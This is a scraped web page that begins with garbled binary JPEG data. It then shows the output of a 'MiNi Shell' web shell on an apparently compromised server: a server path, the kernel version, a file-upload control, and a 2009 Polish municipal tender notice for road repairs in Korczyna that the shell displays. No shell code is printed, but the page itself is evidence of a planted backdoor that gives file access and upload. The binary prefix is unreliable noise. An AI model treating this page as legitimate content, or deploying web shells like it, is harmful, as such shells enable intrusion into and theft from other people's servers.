JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090605/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090605/180474-N-2009.html

<p class="kh_header"><b>Korczyna: Remont nawierzchni drogi gminnej w Korczynie Nr 1 14824R Korczyna Załęże I (ul. Fredry i ul. Spółdzielcza) wraz z przebudową chodników i odwodnienia</b><br>
<b>Numer ogłoszenia: 180474 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korczyna , ul. Rynek 18a, 38-420 Korczyna, woj. podkarpackie, tel. 013 4354080, faks 013 4354096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> korczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni drogi gminnej w Korczynie Nr 1 14824R Korczyna Załęże I (ul. Fredry i ul. Spółdzielcza) wraz z przebudową chodników i odwodnienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie  remontu nawierzchni drogi gminnej w 
    Korczynie Nr 1 14824R Korczyna Załęże I ( ul. Fredry i ul. Spółdzielcza) wraz z 
    przebudową chodników i odwodnienia  -  I odcinka w km od 00 + 000 - 1 + 425.
  Zakres prac:
a) wykonanie podbudowy
b) wykonanie nawierzchni
c) roboty rozbiórkowe
d) wykonanie chodników
e) poszerzenie łuków poziomych (poprawa brd)
f) wykonanie odwodnienia
g) oznakowanie i urządzenie zabezpieczające Brd
h) roboty wykończeniowe 
2. Przedmiot zamówienia dotyczy wykonania I odcinka tj. ul. Fredry i ul. 
    Spółdzielczej w Korczynie.
 
2. Wymagania dodatkowe w ramach przedmiotu zamówienia:

    Wykonawca zobowiązuje się:

 a) wykonać przedmiot zamówienia zgodnie z obowiązującymi w tym zakresie przepisami prawnymi, w szczególności Prawem Budowlanym wraz z przepisami wykonawczymi, przepisami BHP, postanowieniami umowy, specyfikacją istotnych warunków zamówienia, zgodnie z aktualnym poziomem wiedzy technicznej, należytą starannością, etyką zawodową przez osoby posiadające wymagane kwalifikacje i uprawnienia, 
 b) wykonać prace dodatkowe zlecone przez Zamawiającego o wartości do 50% zamówienia podstawowego. W przypadku konieczności wykonania takich prac Wykonawca przed przystąpieniem do  ich realizacji przedstawi Zamawiającemu kosztorys do uzgodnienia. Zlecenie wykonania prac dodatkowych nastąpi przez podpisanie odrębnej umowy,
 c) wykonać przedmiot zamówienia własnymi siłami bez zlecania prac podwykonawcom, 
 d) za ewentualne szkody spowodowane podczas prac budowlanych na nieruchomościach  objętych inwestycją odpowiada Wykonawca,
e)  udzielić minimum 36 miesięcy gwarancji jakości i rękojmi na wykonany przedmiot 
     zamówienia, 
f)  Wykonawca zobowiązuje się do stałego kontaktu z Zamawiającym w sprawach 
     dotyczących przedmiotu zamówienia,
g)  Wykonawca ponosi odpowiedzialność za jakość przedmiotu umowy oraz terminowość jej wykonania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
  1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
      jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
  2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
      technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
      pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
      technicznego i osób zdolnych do wykonania zamówienia,
  3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
      zamówienia,
  4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na 
      podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień 
      publicznych  (Dz. U. z 2007r. 223 poz. 1655 z późn. zm). 
2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
  1) wykonawców, którzy nie spełniają warunków udziału w postępowaniu o 
      zamówienie publiczne, o których mowa w art. 24 ust.1 i 2 ustawy z dnia 29 
      stycznia 2004r. Prawa zamówień publicznych (Dz. U. z 2007r. Nr 223, poz. 
      1655 z późn. zm),
  2) wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik 
      prowadzonego postępowania,
  3) wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w 
      postępowaniu lub dokumentów potwierdzających spełnianie tych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1/ formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ,
2/ oświadczenie Wykonawcy o spełnianiu warunków  wskazanych w art. 22 ust.1 
    Prawa zamówień publicznych, i nie podlegania  wykluczeniu z postępowania na 
    podstawie art. 24 Prawa zamówień publicznych -  załącznik nr 2 do  SIWZ,
3/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
    rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie 
    wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4/ dokumenty potwierdzające uprawnienie do reprezentacji Wykonawcy przez 
    osoby podpisujące ofertę, o ile nie wynikają z przepisów prawa lub innych 
    dokumentów rejestrowych,
5/ wykaz osób, które będą wykonywać zamówienie  lub będą uczestniczyć w 
    wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji - załącznik 
     nr 3 do SIWZ, 
6/ dokument potwierdzający, że Wykonawca posiada aktualne, wymagane 
    przepisami prawa uprawnienia, jeżeli ustawy nakładają obowiązek posiadania 
    takich uprawnień oraz dokument potwierdzający przynależność do właściwej 
    izby samorządu zawodowego,
7/ wykaz wykonanych robót budowlanych w okresie  ostatnich 5 lat ( 2004-2008), 
    co najmniej dwóch zamówień związanych tematycznie z przedmiotem 
    zamówienia, o wartości nie mniejszej niż 1 000 000zł, z podaniem wartości robót 
    brutto, daty (rok), miejsca robót i nazwy Zamawiającego, a jeżeli okres 
    prowadzenia działalności jest krótszy w tym okresie -  załącznik nr 4 do SIWZ,
8/  dokumenty  potwierdzające, że roboty wymienione w ppkt 7 zostały wykonane 
     należycie,
9/ zaświadczenie właściwego Urzędu Skarbowego potwierdzające, że Wykonawca  
    nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na 
    zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w 
    całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 
    miesiące przed upływem terminu składania ofert,
10/ zaświadczenie właściwego oddziału Zakładu  Ubezpieczeń Społecznych 
  potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie  
  zdrowotne lub społeczne, wystawione nie wcześniej niż 3 miesiące przed upływem 
  terminu składania ofert,
11/ wykaz sprzętu do realizacji zamówienia,
12/ oświadczenie o dokonaniu wizji lokalnej placu budowy,
13/ oświadczenie o udzieleniu gwarancji,
14) polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest 
     ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
     działalności gospodarczej. Okres ważności polisy lub innego dokumentu 
     ubezpieczenia musi obejmować co najmniej przewidziany przez zamawiającego 
     w SIWZ okres realizacji zadania, w innym przypadku wykonawca winien 
     dołączyć do oferty oświadczenie o przedłożeniu Zamawiającemu kolejnego 
     dokumentu ubezpieczenia niezwłocznie po wygaśnięciu polisy/ innego 
     dokumentu ubezpieczenia, który dołącza do oferty,
15/ kosztorys ofertowy z podaniem nakładów  robocizny, materiałów i pracy 
     sprzętu oraz określenie stawki roboczogodziny, kosztów pośrednich, kosztów 
     zakupu materiałów i zysku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.korczyna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korczyna
ul. Rynek 18a,  pokój nr 6
38-420 Korczyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2009 godzina 09:30, miejsce: Urząd Gminy Korczyna
ul. Rynek 18a,  pokój nr 13
38-420 Korczyna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com